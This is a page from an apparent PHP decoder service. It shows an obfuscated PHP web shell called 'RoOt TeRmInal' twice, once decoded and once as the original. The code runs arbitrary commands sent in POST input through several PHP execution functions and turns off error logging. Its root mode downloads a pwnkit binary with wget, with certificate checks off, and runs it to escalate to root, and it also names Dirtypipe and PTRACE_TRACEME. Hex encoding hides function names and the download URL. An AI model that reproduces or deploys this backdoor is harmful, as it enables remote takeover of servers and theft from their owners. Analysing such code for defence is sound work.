Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto wQdY5; Wwvwb: ?> ]</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap..
Decoded Output download
<?
goto wQdY5; Wwvwb: ?>
]</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<style>
@import url("https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css");
* {
font-family: monospace;
}
body {
background-color: whitesmoke;
}
ul {
list-style: none;
}
li {
padding: 5px 0px;
}
.terminal-r00t-body {
width: 100%;
height: 60vh;
color: #3acf73;
background-color: #292929;
}
.terminal-r00t-link {
padding: 12px;
text-decoration: none;
background-color: #292929;
color: #3acf73;
border-radius: 7px;
}
.terminal-r00t-link:hover {
color: white;
}
.terminal-header {
margin-left: -25px;
position: relative;
z-index: 2;
}
.terminal-header li {
display: inline;
}
.terminal-r00t-body input[type="text"] {
width: 90%;
border: 1px solid whitesmoke;
background-color: #292929;
border-radius: 3px;
padding: 2px;
color: #3acf73;
}
.terminal-r00t-body input[type="submit"] {
border: 1px solid whitesmoke;
padding: 2px 8.5px;
border-radius: 2px;
color: #3acf73;
background-color: #292929;
}
form {
text-align: center;
padding: 5px;
}
textarea {
background-color: #292929;
color: #3acf73;
width: 99.9%;
height: 50vh;
}
</style>
</head>
<body>
<br>
<center>
<h3><b>RoOt TeRmInal</b></h3>
</center>
<div class="container">
<ul>
<li><b><?php goto ftCbt; Ylpbb: function suggest_exploit() { $uname = $GLOBALS["fungsi"][11](); $xplod = explode(" ", $uname); $xpld = explode("-", $xplod[2]); $pl = explode(".", $xpld[0]); return $pl[0] . "." . $pl[1]; } goto TUoJI; RIsU9: @ini_set("max_execution_time", 0); goto GVhyH; VUmG8: ?>
</b></li>
</ul>
</div>
<div class="container">
<ul class="terminal-header">
<li><a href="?terminal=normal" class="terminal-r00t-link shadow"><i class="bi bi-terminal-plus"></i> Terminal</a></li>
<li><a href="?terminal=root" class="terminal-r00t-link shadow"><i class="bi bi-terminal-dash"></i> R00t Terminal</a></li>
</ul>
<div class="terminal-r00t-body rounded shadow-lg">
<form action="" method="post">
<input type="text" name="terminal" id="" placeholder="terminal@<?php goto u_QeP; z0GSq: ?>
];PKEXEC[<?php goto Gm7q5; KwmV_: $Array = array("7368656c6c5f65786563", "65786563", "7061737374687275", "73797374656d", "70726f635f6f70656e", "706f70656e", "70636c6f7365", "72657475726e", "73747265616d5f6765745f636f6e74656e7473", "676574637764", "6368646972", "7068705f756e616d65", "6973736574", "66756e6374696f6e5f657869737473", "5f6d61645f636d64", "245f5345525645525b275345525645525f4e414d45275d", "68747470733a2f2f7777772e6861786f726469736c616e642e746563682f6c6f63616c726f6f742f70776e6b6974", "66696c655f6765745f636f6e74656e7473", "5345525645525f4e414d45", "6368646972", "676574637764"); goto LlD_t; RTBUC: @ini_set("log_errors", 0); goto RIsU9; t9k7K: echo check_function("perl"); goto z0GSq; VEI2B: for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } goto sDw1y; YVPdw: function root_terminal() { echo "
[+] Downloading The source \xa"; echo _mad_cmd("wget " . $GLOBALS["fungsi"][16] . " --no-check-certificate"); echo "[!] Chmod file pwnkit....\xa"; echo _mad_cmd("chmod +x pwnkit"); echo "[+] Testing if this kernel vulnerable...\xa"; echo "[!] This kernel version is " . kernel_angka() . " \xa"; if (suggest_exploit() == "5.11") { echo "[!] This Kernel Maybe Vuln Dirtypipe
"; } else { if (suggest_exploit() == "4.10") { echo "[!] This Kernel Maybe Vuln PTRACE_TRACEME\xa"; } else { if (distro_linux() == "Debian" || distro_linux() == "Ubuntu" || distro_linux() == "Centos") { echo "[!] This Kernel Maybe Vuln Pwnkit
"; } } } echo _mad_cmd("./pwnkit "id" >> mad-pwnkit"); $check_vulnerable = $GLOBALS["fungsi"][17](__DIR__ . "/mad-pwnkit"); $explode_mad_pwkit = explode(" ", $check_vulnerable); if ($explode_mad_pwkit[0] == "uid=0(root)") { echo "[~] This Kernel is vulnerable congrats!
"; } else { echo "[!] This kernel is not Vulnerable Sorry :)"; return; } echo "[+] Giving Permission on mad-pwnkit
"; echo _mad_cmd("chmod +x mad-pwnkit"); if (!_mad_cmd("./pwnkit "id"")) { echo "[!] Cannot running pwnkit"; } else { echo "[!] Done Sir. now u can running on root user!"; die; } } goto O2S6s; LkB27: function redir($url, $value) { return "<meta http-equiv="refresh" content="0;url=?terminal=" . $value . "&path=" . hex($url) . "">"; } goto dFjdU; IMWCj: function _mad_cmd($de) { $out = ''; try { if (function_exists("shell_exec")) { return @$GLOBALS["fungsi"][0]($de); } else { if (function_exists("system")) { @$GLOBALS["fungsi"][3]($de); } else { if (function_exists("exec")) { $exec = array(); @$GLOBALS["fungsi"][1]($de, $exec); $out = @join("
", $exec); return $exec; } else { if (function_exists("passthru")) { @$GLOBALS["fungsi"][2]($de); } else { if (function_exists("popen") && function_exists("pclose")) { if (is_resource($f = @$GLOBALS["fungsi"][5]($de, "r"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } return $out; $GLOBALS["fungsi"][6]($f); } } else { if (function_exists("proc_open")) { $pipes = array(); $process = @$GLOBALS["fungsi"][4]($de . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @$GLOBALS["fungsi"][8]($pipes[1]); return $out; } else { if (class_exists("COM")) { $madWs = new COM("WScript.shell"); $exec = $madWs->{$GLOBALS["fungsi"][1]}("cmd.exe /c " . $_POST["alfa1"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } } } } } } } catch (Exception $e) { } return $out; } goto YVPdw; us4gq: ?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>RoOt TeRmInal [<?php goto FASnP; bJOVG: echo check_function("gcc"); goto keuaE; dYjBO: if ($_GET["terminal"] == "normal") { echo "<textarea class="border-0" disabled>"; if (isset($_POST["submit"])) { echo htmlspecialchars(_mad_cmd($terminal . " 2>&1")); } echo "</textarea>"; } else { if ($_GET["terminal"] == "root") { echo "<textarea class="border-0" disabled>"; if ($terminal == "root") { root_terminal(); } echo htmlspecialchars(_mad_cmd("./pwnkit "" . $terminal . """)); echo "</textarea>
"; } else { echo base64_decode("WyBQcml2ZWxlZ2UgRXNjYWxhdGlvbiBFeHBsb2l0ZXIgXTxicj4KWytdIEF1dGhvciA6IC4vTXJNYWQ8YnI+ClsrXSBodHRwczovL2dpdGh1Yi5jb20vTWFkRXhwbG9pdHM8YnI+Cjxicj4KWytdIFR5cGUgcm9vdCBmb3IgcnVubmluZyBhdXRvIHJvb3Q="); } } goto Rj81Q; FASnP: echo $_SERVER["SERVER_NAME"]; goto Wwvwb; NVxeM: @ini_set("display_errors", 0); goto KwmV_; a0zSO: $terminal = $_POST["terminal"]; goto dYjBO; GVhyH: @ini_set("output_buffering", 0); goto NVxeM; O2S6s: function check_function($value) { if (_mad_cmd("{$value} --version")) { return "<font color='green'>ON</font>"; } else { return "<font color='red'>OFF</font>"; } } goto j7yno; BI9W8: function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } goto Ylpbb; u_QeP: echo $_SERVER[$fungsi[18]]; goto mrHwV; ftCbt: echo $fungsi[11](); goto xksW3; wQdY5: @set_time_limit(0); goto s2ZSu; cJTyP: echo get_current_user(); goto VUmG8; keuaE: ?>
]</b></li>
<li><b><?php goto cJTyP; mrHwV: ?>
~#" autofocus>
<input type="submit" name="submit" value=">">
</form>
<br>
<?php goto a0zSO; LlD_t: $hitung_array = count($Array); goto VEI2B; RinVA: echo check_function("bash"); goto zNT7l; sDw1y: if ($_GET["terminal"] == "root" || $_GET["terminal"] == "normal") { $terminal = $_POST["terminal"]; $xpls = explode(" ", $terminal); if ($terminal == "cd " . $xpls[1]) { echo redir($xpls[1], $_GET["terminal"]); } } goto uQJz_; zNT7l: ?>
];PERL[<?php goto t9k7K; xhG5T: @ini_set("error_log", NULL); goto RTBUC; TUoJI: function distro_linux() { $uname = $GLOBALS["fungsi"][11](); $xplod = explode(" ", $uname); return $xplod[6]; } goto LkB27; xksW3: ?>
</b></li>
<li><b>BASH[<?php goto RinVA; w40Fv: ?>
];GCC[<?php goto bJOVG; Gm7q5: echo check_function("pkexec"); goto w40Fv; s2ZSu: @clearstatcache(); goto xhG5T; OaN_e: function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } goto BI9W8; uQJz_: if (isset($_GET["path"])) { $cdir = unhex($_GET["path"]); $fungsi[19]($cdir); } else { $cdir = $fungsi[20](); } goto us4gq; Rj81Q: ?>
</div>
</div>
<center>
<span><b>©Copyright By ./MrMad</b></span>
</center>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-u1OknCvxWvY5kfmNBILK2hRnQC3Pr17a+RTT6rIHI7NnikvbZlHgTPOOmMi466C8" crossorigin="anonymous"></script>
</body>
</html>
<?php goto IMWCj; j7yno: function kernel_angka() { $uname = $GLOBALS["fungsi"][11](); $xplod = explode(" ", $uname); $xpld = explode("-", $xplod[2]); return $xpld[0]; } goto OaN_e; dFjdU: ?>
Did this file decode correctly?
Original Code
goto wQdY5; Wwvwb: ?>
]</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<style>
@import url("https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css");
* {
font-family: monospace;
}
body {
background-color: whitesmoke;
}
ul {
list-style: none;
}
li {
padding: 5px 0px;
}
.terminal-r00t-body {
width: 100%;
height: 60vh;
color: #3acf73;
background-color: #292929;
}
.terminal-r00t-link {
padding: 12px;
text-decoration: none;
background-color: #292929;
color: #3acf73;
border-radius: 7px;
}
.terminal-r00t-link:hover {
color: white;
}
.terminal-header {
margin-left: -25px;
position: relative;
z-index: 2;
}
.terminal-header li {
display: inline;
}
.terminal-r00t-body input[type="text"] {
width: 90%;
border: 1px solid whitesmoke;
background-color: #292929;
border-radius: 3px;
padding: 2px;
color: #3acf73;
}
.terminal-r00t-body input[type="submit"] {
border: 1px solid whitesmoke;
padding: 2px 8.5px;
border-radius: 2px;
color: #3acf73;
background-color: #292929;
}
form {
text-align: center;
padding: 5px;
}
textarea {
background-color: #292929;
color: #3acf73;
width: 99.9%;
height: 50vh;
}
</style>
</head>
<body>
<br>
<center>
<h3><b>RoOt TeRmInal</b></h3>
</center>
<div class="container">
<ul>
<li><b><?php goto ftCbt; Ylpbb: function suggest_exploit() { $uname = $GLOBALS["\x66\x75\156\x67\163\x69"][11](); $xplod = explode("\40", $uname); $xpld = explode("\55", $xplod[2]); $pl = explode("\56", $xpld[0]); return $pl[0] . "\x2e" . $pl[1]; } goto TUoJI; RIsU9: @ini_set("\x6d\141\x78\x5f\x65\x78\x65\143\x75\x74\151\x6f\x6e\137\164\151\x6d\145", 0); goto GVhyH; VUmG8: ?>
</b></li>
</ul>
</div>
<div class="container">
<ul class="terminal-header">
<li><a href="?terminal=normal" class="terminal-r00t-link shadow"><i class="bi bi-terminal-plus"></i> Terminal</a></li>
<li><a href="?terminal=root" class="terminal-r00t-link shadow"><i class="bi bi-terminal-dash"></i> R00t Terminal</a></li>
</ul>
<div class="terminal-r00t-body rounded shadow-lg">
<form action="" method="post">
<input type="text" name="terminal" id="" placeholder="terminal@<?php goto u_QeP; z0GSq: ?>
];PKEXEC[<?php goto Gm7q5; KwmV_: $Array = array("\67\63\66\x38\x36\65\66\143\66\143\65\146\x36\65\67\x38\66\65\66\x33", "\66\65\x37\x38\x36\65\x36\63", "\x37\60\66\61\x37\63\67\x33\67\64\66\x38\67\62\67\x35", "\x37\x33\x37\x39\67\x33\67\64\66\65\66\144", "\67\60\x37\62\x36\x66\66\63\65\146\66\x66\67\60\66\65\x36\145", "\x37\60\66\146\x37\x30\x36\x35\66\x65", "\67\x30\66\x33\66\143\66\x66\x37\x33\x36\x35", "\67\62\66\65\67\x34\x37\x35\67\x32\66\x65", "\67\63\67\x34\x37\x32\x36\x35\x36\x31\x36\x64\65\x66\66\x37\x36\65\x37\x34\x35\x66\x36\x33\66\x66\66\145\x37\x34\66\x35\x36\x65\67\x34\x37\63", "\66\x37\66\x35\67\x34\x36\x33\x37\x37\66\64", "\66\x33\x36\70\66\64\x36\x39\x37\x32", "\x37\x30\x36\70\67\x30\65\x66\67\x35\x36\x65\66\61\66\144\x36\x35", "\66\x39\67\x33\67\63\66\65\67\x34", "\66\66\67\65\x36\145\x36\63\67\x34\x36\71\x36\146\66\x65\x35\146\x36\65\67\70\x36\71\x37\63\67\x34\x37\x33", "\65\146\66\144\66\x31\x36\64\65\x66\x36\x33\x36\144\66\64", "\62\x34\65\x66\65\63\64\x35\65\x32\x35\66\x34\x35\65\62\65\142\x32\67\65\x33\x34\65\x35\62\x35\x36\64\x35\x35\62\x35\146\x34\145\x34\x31\x34\144\x34\65\x32\x37\65\144", "\x36\x38\x37\x34\x37\64\x37\x30\x37\x33\x33\141\62\146\x32\146\67\67\67\67\67\x37\62\145\x36\70\66\61\67\70\x36\146\67\62\66\x34\x36\x39\x37\63\66\x63\66\x31\66\145\66\64\62\145\67\x34\x36\65\66\x33\x36\70\62\x66\66\x63\66\146\x36\63\66\x31\x36\143\67\62\66\146\x36\x66\67\64\62\146\67\x30\x37\67\66\145\x36\x62\x36\71\x37\64", "\x36\x36\66\71\66\x63\66\65\x35\x66\x36\x37\x36\65\x37\64\x35\x66\x36\63\66\x66\x36\x65\67\x34\66\65\x36\145\67\x34\x37\x33", "\x35\63\x34\x35\65\62\65\x36\x34\65\65\62\65\x66\x34\x65\x34\x31\64\144\x34\x35", "\66\63\x36\70\x36\x34\66\71\67\x32", "\66\x37\66\65\x37\x34\x36\63\x37\67\x36\x34"); goto LlD_t; RTBUC: @ini_set("\154\x6f\x67\137\x65\162\x72\x6f\x72\x73", 0); goto RIsU9; t9k7K: echo check_function("\160\x65\162\154"); goto z0GSq; VEI2B: for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } goto sDw1y; YVPdw: function root_terminal() { echo "\12\x5b\53\135\x20\x44\157\x77\x6e\x6c\157\141\x64\x69\x6e\147\x20\x54\x68\145\x20\163\157\x75\x72\143\x65\x20\xa"; echo _mad_cmd("\167\x67\x65\x74\40" . $GLOBALS["\146\x75\156\147\163\151"][16] . "\x20\x2d\55\156\x6f\55\143\x68\x65\x63\153\x2d\x63\145\162\164\151\x66\x69\x63\141\164\x65"); echo "\x5b\x21\x5d\x20\x43\150\155\157\144\x20\x66\x69\154\145\x20\160\x77\x6e\153\151\x74\x2e\56\x2e\56\xa"; echo _mad_cmd("\143\x68\155\157\x64\40\53\170\40\x70\x77\x6e\x6b\151\164"); echo "\x5b\53\135\40\124\x65\163\x74\151\x6e\147\40\151\146\x20\x74\x68\x69\163\x20\153\x65\x72\156\145\x6c\x20\166\165\x6c\x6e\x65\x72\x61\142\x6c\x65\56\56\x2e\xa"; echo "\x5b\x21\x5d\40\124\x68\151\x73\x20\153\x65\x72\156\x65\154\40\166\x65\162\163\151\x6f\156\40\151\163\40" . kernel_angka() . "\x20\xa"; if (suggest_exploit() == "\x35\56\61\x31") { echo "\133\41\x5d\x20\x54\x68\151\x73\40\113\x65\162\156\x65\154\x20\x4d\x61\171\x62\145\x20\x56\x75\154\x6e\40\104\151\162\x74\x79\x70\151\x70\145\12"; } else { if (suggest_exploit() == "\x34\56\61\60") { echo "\133\41\x5d\x20\124\150\151\x73\x20\113\x65\162\x6e\145\154\x20\115\x61\x79\142\x65\40\126\165\x6c\x6e\x20\x50\124\122\x41\103\105\137\x54\x52\x41\x43\105\x4d\105\xa"; } else { if (distro_linux() == "\104\x65\142\x69\141\x6e" || distro_linux() == "\125\x62\x75\x6e\x74\x75" || distro_linux() == "\103\145\156\x74\157\x73") { echo "\x5b\x21\x5d\x20\x54\x68\151\x73\x20\x4b\145\162\156\145\154\40\x4d\141\171\142\145\40\x56\165\154\156\x20\x50\x77\156\x6b\x69\x74\12"; } } } echo _mad_cmd("\56\x2f\x70\x77\156\153\151\x74\40\x22\151\x64\42\40\76\x3e\x20\x6d\141\144\x2d\x70\x77\x6e\x6b\x69\x74"); $check_vulnerable = $GLOBALS["\146\x75\156\x67\x73\151"][17](__DIR__ . "\x2f\155\x61\x64\55\160\x77\156\153\x69\164"); $explode_mad_pwkit = explode("\x20", $check_vulnerable); if ($explode_mad_pwkit[0] == "\165\x69\144\75\x30\x28\162\157\x6f\164\x29") { echo "\x5b\x7e\x5d\40\x54\150\151\x73\40\113\x65\162\x6e\x65\x6c\40\x69\x73\40\166\165\x6c\x6e\x65\162\141\x62\x6c\x65\40\x63\157\156\x67\x72\x61\164\163\x21\12"; } else { echo "\x5b\x21\x5d\x20\x54\x68\151\x73\x20\153\x65\x72\156\145\x6c\40\x69\163\x20\x6e\x6f\x74\40\126\x75\x6c\156\x65\x72\141\142\x6c\145\40\123\157\x72\162\171\x20\x3a\51"; return; } echo "\133\53\135\x20\x47\151\166\x69\156\x67\40\x50\x65\x72\x6d\151\x73\x73\x69\x6f\156\x20\157\156\x20\155\141\144\55\x70\167\x6e\153\151\164\12"; echo _mad_cmd("\x63\150\x6d\x6f\144\40\x2b\x78\x20\155\141\x64\55\x70\x77\x6e\x6b\x69\x74"); if (!_mad_cmd("\56\x2f\160\x77\x6e\153\151\164\40\42\151\x64\42")) { echo "\x5b\x21\x5d\40\x43\141\x6e\156\157\164\40\162\x75\156\x6e\151\156\147\40\x70\167\156\153\151\164"; } else { echo "\133\41\x5d\40\104\x6f\x6e\x65\x20\123\151\162\x2e\40\x6e\x6f\x77\40\165\x20\x63\x61\x6e\40\162\x75\x6e\156\151\x6e\x67\40\157\x6e\x20\x72\x6f\x6f\x74\40\x75\x73\x65\x72\41"; die; } } goto O2S6s; LkB27: function redir($url, $value) { return "\x3c\155\x65\x74\x61\x20\150\x74\x74\160\55\145\x71\x75\151\166\75\x22\162\x65\x66\162\x65\163\x68\42\x20\x63\157\x6e\x74\145\x6e\164\x3d\42\x30\x3b\x75\162\x6c\75\x3f\x74\145\x72\155\x69\x6e\x61\x6c\75" . $value . "\x26\x70\141\x74\150\x3d" . hex($url) . "\42\76"; } goto dFjdU; IMWCj: function _mad_cmd($de) { $out = ''; try { if (function_exists("\163\150\145\x6c\x6c\137\x65\170\x65\x63")) { return @$GLOBALS["\146\165\156\147\x73\151"][0]($de); } else { if (function_exists("\163\171\x73\164\x65\155")) { @$GLOBALS["\x66\165\156\147\163\x69"][3]($de); } else { if (function_exists("\145\170\x65\x63")) { $exec = array(); @$GLOBALS["\146\x75\x6e\147\163\151"][1]($de, $exec); $out = @join("\12", $exec); return $exec; } else { if (function_exists("\160\141\163\163\x74\150\x72\x75")) { @$GLOBALS["\x66\165\x6e\x67\x73\x69"][2]($de); } else { if (function_exists("\x70\157\160\x65\156") && function_exists("\160\143\x6c\x6f\163\x65")) { if (is_resource($f = @$GLOBALS["\146\x75\x6e\x67\x73\151"][5]($de, "\x72"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } return $out; $GLOBALS["\x66\x75\x6e\x67\x73\151"][6]($f); } } else { if (function_exists("\160\162\x6f\143\x5f\157\x70\145\x6e")) { $pipes = array(); $process = @$GLOBALS["\x66\165\x6e\x67\x73\151"][4]($de . "\40\62\x3e\46\x31", array(array("\x70\x69\x70\x65", "\x77"), array("\160\x69\x70\x65", "\x77"), array("\160\x69\160\145", "\167")), $pipes, null); $out = @$GLOBALS["\x66\165\156\x67\163\151"][8]($pipes[1]); return $out; } else { if (class_exists("\x43\x4f\x4d")) { $madWs = new COM("\127\x53\143\x72\151\160\164\56\x73\150\x65\x6c\154"); $exec = $madWs->{$GLOBALS["\146\165\156\x67\163\151"][1]}("\x63\155\x64\x2e\145\x78\145\40\57\143\40" . $_POST["\141\154\x66\x61\61"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } } } } } } } catch (Exception $e) { } return $out; } goto YVPdw; us4gq: ?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>RoOt TeRmInal [<?php goto FASnP; bJOVG: echo check_function("\x67\143\143"); goto keuaE; dYjBO: if ($_GET["\164\145\x72\x6d\151\156\x61\x6c"] == "\156\157\162\155\x61\x6c") { echo "\x3c\164\145\170\164\141\x72\145\141\x20\x63\x6c\x61\x73\x73\x3d\42\x62\157\x72\144\x65\x72\x2d\60\42\x20\x64\x69\x73\x61\142\154\x65\x64\x3e"; if (isset($_POST["\x73\165\x62\x6d\151\164"])) { echo htmlspecialchars(_mad_cmd($terminal . "\40\62\76\46\x31")); } echo "\x3c\57\164\145\170\x74\x61\162\145\x61\76"; } else { if ($_GET["\x74\145\162\155\x69\x6e\141\x6c"] == "\x72\x6f\157\x74") { echo "\x3c\164\145\x78\x74\x61\x72\x65\141\40\143\x6c\141\x73\163\x3d\x22\x62\157\x72\144\x65\162\55\x30\42\40\144\x69\x73\141\142\154\x65\x64\x3e"; if ($terminal == "\x72\x6f\x6f\x74") { root_terminal(); } echo htmlspecialchars(_mad_cmd("\x2e\x2f\x70\x77\x6e\x6b\151\x74\x20\42" . $terminal . "\42")); echo "\x3c\57\164\x65\170\x74\141\162\145\x61\76\12"; } else { echo base64_decode("\127\171\102\121\x63\155\x6c\62\x5a\x57\170\154\132\62\x55\147\122\x58\116\x6a\x59\x57\170\150\144\107\154\166\142\151\102\106\x65\x48\x42\x73\x62\62\x6c\x30\x5a\x58\x49\147\x58\124\x78\x69\143\x6a\x34\x4b\127\171\x74\x64\111\105\106\61\144\107\x68\166\x63\151\101\x36\x49\103\64\166\x54\x58\112\116\131\127\121\x38\131\156\x49\53\x43\154\163\162\130\x53\102\x6f\x64\110\122\x77\143\172\x6f\x76\114\x32\144\x70\x64\x47\150\x31\131\151\65\x6a\142\x32\60\166\x54\x57\x46\x6b\122\130\x68\167\142\107\71\160\144\110\115\70\x59\156\111\53\x43\x6a\x78\151\143\x6a\64\x4b\x57\171\164\x64\x49\106\x52\x35\x63\107\x55\x67\143\x6d\71\166\144\103\102\155\x62\63\111\x67\143\x6e\126\x75\142\x6d\154\165\132\x79\x42\x68\x64\x58\x52\x76\x49\110\112\166\x62\x33\x51\x3d"); } } goto Rj81Q; FASnP: echo $_SERVER["\x53\105\x52\x56\105\122\137\116\101\x4d\105"]; goto Wwvwb; NVxeM: @ini_set("\144\x69\x73\x70\x6c\141\171\x5f\145\162\162\x6f\x72\x73", 0); goto KwmV_; a0zSO: $terminal = $_POST["\164\x65\162\x6d\151\156\141\x6c"]; goto dYjBO; GVhyH: @ini_set("\x6f\x75\164\160\x75\x74\137\x62\x75\x66\x66\145\x72\x69\156\x67", 0); goto NVxeM; O2S6s: function check_function($value) { if (_mad_cmd("{$value}\x20\x2d\x2d\x76\145\162\x73\151\157\x6e")) { return "\x3c\x66\x6f\156\x74\x20\x63\157\154\x6f\x72\75\47\x67\162\x65\145\x6e\x27\76\x4f\116\74\57\146\157\x6e\x74\76"; } else { return "\74\x66\157\x6e\x74\40\x63\157\154\157\x72\75\47\x72\x65\x64\x27\x3e\x4f\106\106\x3c\57\146\157\156\x74\76"; } } goto j7yno; BI9W8: function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } goto Ylpbb; u_QeP: echo $_SERVER[$fungsi[18]]; goto mrHwV; ftCbt: echo $fungsi[11](); goto xksW3; wQdY5: @set_time_limit(0); goto s2ZSu; cJTyP: echo get_current_user(); goto VUmG8; keuaE: ?>
]</b></li>
<li><b><?php goto cJTyP; mrHwV: ?>
~#" autofocus>
<input type="submit" name="submit" value=">">
</form>
<br>
<?php goto a0zSO; LlD_t: $hitung_array = count($Array); goto VEI2B; RinVA: echo check_function("\142\x61\163\150"); goto zNT7l; sDw1y: if ($_GET["\164\x65\x72\155\151\156\141\154"] == "\162\x6f\x6f\164" || $_GET["\164\145\162\155\151\156\x61\154"] == "\x6e\x6f\162\x6d\x61\x6c") { $terminal = $_POST["\164\x65\162\x6d\151\156\141\x6c"]; $xpls = explode("\40", $terminal); if ($terminal == "\143\144\40" . $xpls[1]) { echo redir($xpls[1], $_GET["\164\145\162\x6d\x69\x6e\141\x6c"]); } } goto uQJz_; zNT7l: ?>
];PERL[<?php goto t9k7K; xhG5T: @ini_set("\x65\x72\x72\157\162\x5f\x6c\157\x67", NULL); goto RTBUC; TUoJI: function distro_linux() { $uname = $GLOBALS["\146\x75\156\147\163\151"][11](); $xplod = explode("\x20", $uname); return $xplod[6]; } goto LkB27; xksW3: ?>
</b></li>
<li><b>BASH[<?php goto RinVA; w40Fv: ?>
];GCC[<?php goto bJOVG; Gm7q5: echo check_function("\160\153\x65\170\x65\143"); goto w40Fv; s2ZSu: @clearstatcache(); goto xhG5T; OaN_e: function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } goto BI9W8; uQJz_: if (isset($_GET["\160\141\164\x68"])) { $cdir = unhex($_GET["\160\141\164\150"]); $fungsi[19]($cdir); } else { $cdir = $fungsi[20](); } goto us4gq; Rj81Q: ?>
</div>
</div>
<center>
<span><b>©Copyright By ./MrMad</b></span>
</center>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-u1OknCvxWvY5kfmNBILK2hRnQC3Pr17a+RTT6rIHI7NnikvbZlHgTPOOmMi466C8" crossorigin="anonymous"></script>
</body>
</html>
<?php goto IMWCj; j7yno: function kernel_angka() { $uname = $GLOBALS["\146\x75\x6e\x67\x73\151"][11](); $xplod = explode("\x20", $uname); $xpld = explode("\55", $xplod[2]); return $xpld[0]; } goto OaN_e; dFjdU:
Function Calls
None |
Stats
MD5 | 6f19f46b85fc0bf1175b6b075918035f |
Eval Count | 0 |
Decode Time | 46 ms |